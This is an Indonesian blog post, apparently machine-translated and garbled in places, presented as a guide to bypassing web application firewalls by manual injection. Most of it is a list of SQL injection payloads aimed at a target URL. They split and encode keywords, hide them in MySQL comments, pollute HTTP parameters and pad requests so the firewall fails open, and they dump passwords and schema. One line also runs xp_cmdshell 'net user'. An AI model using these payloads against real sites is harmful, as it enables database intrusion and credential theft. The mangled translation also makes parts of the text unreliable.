Cara Ampuh Bypass WAF (Web Aplication Firewall) Dengan Manual Inject

 firewall aplikasi web (atau WAF), memonitor, dan memblokir lalu lintas HTTP ke dan dari aplikasi web . WAF dibedakan dari firewall biasa karena WAF dapat memfilter konten aplikasi web tertentu sementara firewall biasa berfungsi sebagai gerbang keamanan antar server. Dengan memeriksa lalu lintas HTTP, itu dapat mencegah serangan yang berasal dari kelemahan keamanan aplikasi web, seperti injeksi SQL , skrip lintas situs (XSS), penyertaan file , dan kesalahan konfigurasi keamanan .__ Wiki

Bagaimana WAF bekerja?

• Exception Detection Protocol: Menolak permintaan yang tidak memenuhi standar HTTP
• Validasi masukan yang disempurnakan: Proxy dan validasi sisi server, bukan hanya validasi sisi-klien
• Daftar Putih & Daftar Hitam
• Perlindungan berbasis aturan dan pengecualian: lebih banyak mekanisme berbasis hitam berdasarkan aturan, lebih fleksibel berdasarkan pengecualian
• Manajemen negara: fokus pada perlindungan sesi Ada juga: Perlindungan cookie, teknologi pencegahan anti-intrusi, pemantauan respons dan perlindungan pengungkapan informasi.

Bagaimana cara mem-bypass WAF

1.   Ganti kata kunci (Masukkan karakter khusus yang akan dihapus oleh WAF) - SELECT dapat menjadi SEL <ECT yang akan diteruskan sebagai SELECT setelah karakter yang melanggar dihapus.

2.  http://target.com/index.php?page_id=-15   UNIunionON SELselectECT 1,2,3,4 
3. Menyandi 
   + URL encode

    page.php?id=1%252f%252a*/UNION%252f%252a /SELECT 

   + Hex encode

    target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…   SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) 

   + Unicode menyandikan

    ?id=10%D6'%20AND%201=2%23    SELECT 'Ä'='A'; #1 
4. Gunakan komentar 
   Masukkan komentar di tengah-tengah string serangan. Sebagai contoh, / *! SELECT * / mungkin diabaikan oleh WAF tetapi diteruskan ke aplikasi target dan diproses oleh database mysql.

    index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4     'union%a0select pass from users# index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3   ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4… 

5. Fungsi dan perintah yang setara 
   Beberapa fungsi atau perintah tidak dapat digunakan karena kata kunci ini terdeteksi, tetapi dalam banyak kasus kami dapat digunakan dengan kode yang setara atau serupa.

    hex()、bin() ==> ascii() sleep() ==>benchmark() concat_ws()==>group_concat() substr((select 'password'),1,1) = 0x70   strcmp(left('password',1), 0x69) = 1  strcmp(left('password',1), 0x70) = 0   strcmp(left('password',1), 0x71) = -1 mid()、substr() ==> substring() @ @user ==> user() @ @datadir ==> datadir()

1. Simbol khusus Di sini saya memiliki karakter non-alfanumerik dalam simbol khusus kelas, simbol khusus memiliki arti dan penggunaan khusus. 
   + `simbol: pilih` versi () `; 
   + + -: pilih + id-1 + 1.from pengguna; 
   + @: select@ ^ 1.dari pengguna; 
   + Fungsi Mysql () sebagai xxx 
   + `、 ~ 、! 、 @ 、% 、 () 、 [] 、. 、 - 、 + 、 | 、% 00 
   Contoh:

    'se'+'lec'+'t'      %S%E%L%E%C%T 1      1.aspx?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ”net user”') ' or --+2=- -!!!'2   id=1+(UnI)(oN)+(SeL)(EcT) 
2. Kontrol parameter HTTPSupply beberapa parameter = set nilai dengan nama yang sama untuk membingungkan WAF. Dengan memberikan contoh http://example.com?id=1&?id= ' atau' 1 '=' 1 ′ - 'dalam beberapa keadaan seperti dengan Apache / PHP, aplikasi hanya akan menguraikan contoh terakhir (kedua) dari id = ketika WAF hanya mem-parse yang pertama. Tampaknya merupakan permintaan yang sah tetapi aplikasi masih menerima dan memproses masukan berbahaya. Kebanyakan WAF saat ini tidak rentan terhadap HTTP Parameter Pollution (HPP) tetapi masih layak dicoba saat membangun bypass. 
   + HPP (HTTP Parameter Polution)

    /?id=1;select+1,2,3+from+users+where+id=1—   /?id=1;select+1 & id=2,3+from+users+where+id=1—   /?id=1/**/union/* & id=*/select/* & id=*/pwd/* & id=*/from/* & id=*/users 

1. HPP juga dikenal sebagai kontaminasi parameter berulang, yang paling sederhana adalah: uid = 1 & uid = 2 & uid = 3, untuk kasus ini, pemrosesan server Web yang berbeda sebagai berikut: 
   
   + HPF (Fragmen Parameter HTTP)

   Metode ini adalah injeksi segmentasi HTTP, mirip dengan CRLF (menggunakan karakter kontrol% 0a,% 0d, dll. Untuk melakukan jeda baris)

    /?a=1+union/* & b=*/select+1,pass/* & c=*/from+users--  select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users— 

   + HPC (Kontaminasi Parameter HTTP) 
   RFC2396 mendefinisikan karakter berikut:

    Unreserved: az, AZ, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } |  ^ [ ] ` 

   Proses pemrosesan server web yang berbeda memiliki logika yang berbeda ketika membangun permintaan khusus: 
   
   Dalam kasus karakter sihir%, Asp / Asp.net akan terpengaruh 
   

2. Buffer overflowwaF adalah, setelah semua, aplikasi dan rentan terhadap kelemahan perangkat lunak yang sama seperti aplikasi lain. Jika kondisi buffer overflow dapat membuat crash, bahkan jika itu tidak menghasilkan eksekusi kode, ini dapat menyebabkan WAF gagal terbuka. Dengan kata lain, sebuah jalan pintas.

    ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 
3. IntegrationIntegration berarti penggunaan berbagai teknologi bypass, teknologi tunggal mungkin tidak dapat melewati mekanisme penyaringan, tetapi penggunaan berbagai teknologi dengan kemungkinan sukses akan meningkat banyak.

    target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4… id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– - ?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e-- 

Share this post